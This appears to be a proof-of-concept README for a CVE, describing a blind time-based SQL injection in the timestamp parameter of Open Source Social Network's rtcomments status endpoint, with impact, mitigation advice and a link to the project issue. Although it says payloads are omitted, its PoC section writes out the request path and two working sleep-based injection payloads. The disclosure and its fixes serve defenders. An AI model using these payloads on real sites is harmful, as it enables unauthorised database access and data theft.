CVE-2025-63585 PoC — Open Source Social Network 安全漏洞

Source

Associated Vulnerability

Readme

# CVE-2025-63585
**Blind Time-Based SQL Injection in /action/rtcomments/status (parameter: timestamp)**

A blind, time-based SQL injection vulnerability was found in the timestamp parameter of the /action/rtcomments/status endpoint. An authenticated attacker who can supply this parameter may be able to execute arbitrary SQL queries, potentially exposing or modifying sensitive data.

**Impact:** data disclosure, data modification, privilege escalation,Potential Denial of Service (DoS) through time-delay queries, (depending on DB permissions).

**Mitigation:** Upgrade OSSN to version 8.9 or later. Additionally, ensure the application uses parameterized queries/prepared statements for all database access, validate timestamp input strictly (accept only expected numeric or ISO formats), enforce least-privilege for the DB account, and enable query timeouts and logging.

**Notes:** Exploit payloads are intentionally omitted for safety.

**github:** https://github.com/opensource-socialnetwork/opensource-socialnetwork/issues/2503

**PoC**

Send request with method POST '/action/rtcomments/status?guid=18&type=post&ossn_ts=1759741100&ossn_token=c3901a321e755ea3e9956e79eb0fbc7e674f80665725774738b93324699c7c28'

Payload: timestamp=(select*from(select(sleep(10)))a)
<img width="1925" height="857" alt="image" src="https://github.com/user-attachments/assets/5429e5e5-414b-4b2f-b598-ce5761515d4a" />

Payload: timestamp=(select*from(select(sleep(30)))a)
<img width="1929" height="858" alt="image" src="https://github.com/user-attachments/assets/b00b531c-13d6-4d94-99f3-c6119d01d61d" />

File Snapshot

 [4.0K]  /data/pocs/b458306042b7824842da69283ca1f594669d8d62
└── [1.6K]  README.md

1 directory, 1 file

Remarks